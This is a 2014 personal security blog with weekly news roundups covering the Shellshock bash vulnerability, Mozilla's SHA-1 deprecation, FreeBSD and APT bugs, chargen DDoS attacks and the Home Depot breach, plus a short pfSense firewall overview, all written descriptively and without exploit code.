Meine Blog-Liste

  • end of life - Good morning, as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots h...
    vor 2 Jahren

Sonntag, 28. September 2014

This week in security Week 39

This is my review of the biggest security of last week. caused by a lot of trouble within the bash, there are only two topics this week.

Mozilla will phase out SHA-1 certificates. As reported in a blog post caused by an increasing  amount of attacks against this 20 year old standard, Mozilla will drop the support for SHA-1 certificates . CAs and server operator should renew their certificated switching to a newer standard. The timeline shows that they will accept these certificates until 2017/01/01.

A bash vulnerability was found. It was reported as CVE-2014-6271. Described in an very easy way, bash is currently vulnerable to code injections. As many services are using bash, for example the DHCP client, malicious servers might can inject code on the client server and execute it.
When recalling the news this week, it seems that nothing was as important as this fraud to the bash. So lets get a bit in more detail. Many Proof Of Concepts has been published this week, what they all have in common is that you need to have an service using the bash and this service should be available from the external network.

As taken from the bug description, here is the (first) list of possible frauds:
  • Apache HTTP Server using mod_cgi or mod_cgid scripts either written in bash, or spawn GNU Bash subshells, or on any system where the /bin/sh interface is implemented using GNU Bash.
  • Override or Bypass ForceCommand feature in OpenSSH sshd and limited protection for some Git and Subversion deployments used to restrict shells and allows arbitrary command execution capabilities. This data path is vulnerable on systems where the /bin/sh interface is implemented using GNU Bash.
  • Allow arbitrary commands to run on a DHCP client machine.

So, whats bad in this case: If you use bash as a cgi language in your web-service you should fix this bug. If you use servers within a data-center and your provider assigns your ip address via DHCP you should fix your systems and talk to your provider.
All in all it isn't easy to inject calls into your bash from an external network. Or at least it should not be a easy. So in all cases, updates are provided, fix your system. If unsure, maybe you are running an outdated version which will not receive any updates. Should down the service which you think is maybe influenced and test it.
The IBM intrusion detection solution is using a mechanism to avoid shell injection since 7 years.

Dienstag, 23. September 2014

[Tool] pfsense, the all-in-one firewall

Whatever we learned from the big company's in network infrastructure, there is one thing Juniper and Cisco have in common. Both bank on FreeBSD.

So there is another firewall system which does so, pfsense.

The pfSense® project is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. The pfSense project has become a fairly popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a single computer to large corporations, universities and other organizations protecting thousands of network devices.
This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. We also offer an embedded image for Compact Flash based installations. The two projects have since diverged significantly.
We've steadily grown to become one of the most widely used network firewalls in the world, with in excess of 200,000 known live installs as of December 2013.

 In the usual case you just download a live installer from their website. Both i386 and amd54 architectures are supported. The basic installation is quite easy handled.
After the reboot you need to choose

  • WAN interface: The Wide Area Network interface, your external connection
  • LAN Interface: The Local Area Network interface, your internal connection
In nowadays design cases, the firewall is placed between the external and internal networks. So any packet from external needs to go through the firewall first.

pfsense has a huge packages database, as there are many features already included or they are easy to install and will be integrated in the webconfiguration toolbox. The following list should give an overview on all these components.
  • Suricata , High Performance Network IDS, IPS and Security Monitoring engine by OISF.
  • HAproxy , The Reliable, High Performance TCP/HTTP Load Balancer 
  • mailscanner , an e-mail security and anti-spam package for e-mail gateway systems.
  • a proxy including mod security, ModSecurity is a web application firewall that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis. In addition this package allows URL forwarding which can be convenient for hosting multiple websites behind pfSense using 1 IP address.
  • squid including squidguard, High performance web proxy cache. It combines squid as a proxy server with it's capabilities of acting as a HTTP / HTTPS reverse proxy. It includes an Exchange-Web-Access (OWA) Assistant.
and many many more.

Pfsense is fully manageable via a web interface. When  both LAN and WAN are set, be careful, WAN access is blocked by default, so you will not be able to access the GUI or ssh from outside. So maybe you want to adjust your internal ips first.

Sonntag, 21. September 2014

This week in security Week 38

Regarding security related news it was an endless week (again), the following are just some of the topics this week

My recent news of the week:

FreeBSD has finally closed a bug which was found within the TCP stack. The original bug was found back in 2004 CVE-2004-0230. The bug basically could led to a Denial-of-Service attack by injecting TCP-RST packages into the stream. RST packages are normally send as response to a none TCP connection, for example when the port rejects the connection. The issue is related to large windows sizes and log active connections, such as BGP. FreeBSD is the used OS underneath Cisco, Juniper and MacOS (for eample).

APT the package management sytsem within Debian and Ubuntu closed a bug regarding the package verification. So basically, the reinstallation of a package does not verify the package again. So if an attacker would be able to infect the package within the cache/tmp directory these package could just be installed.

As reported by some teams, during the last week was a huge income of chargen related attacks. Chargen is an Linux tool which listens on port 19 to tcp and udp packages. Chargen  replies to an request by sending between 0 and 512 random characters to a specified port. A manipulated udp packages could force chargen to send the data as udp package to any service on every server and could be part of a ddos attack. So i would recommend to blog all inbound udp traffic coming from port 19 on a central firewall.

 Spiderlabs the creator of the OWASP mod_security rules, reported about a new attack on their honeypots. In this case, the well known PHP CGI vulnerability is used to upload and install malware.

There was a really good post on the RedHat security blog about the TLS Landscape now a days. In my opinion the key outcome of the post is that we really need to increase the SSL/TLS usage today. Currently only 40% of all web-servers support TLS by default. ;Maybe the Google idea, ranking with TLS higher than others will help in this case too.

In the USA the do-it-ouself centers of Home Depot had an issue, and 56.000.000 credit card information's are lost. According to new information's, many employees informed the management already years ago that this information's aren't secured in the way it should.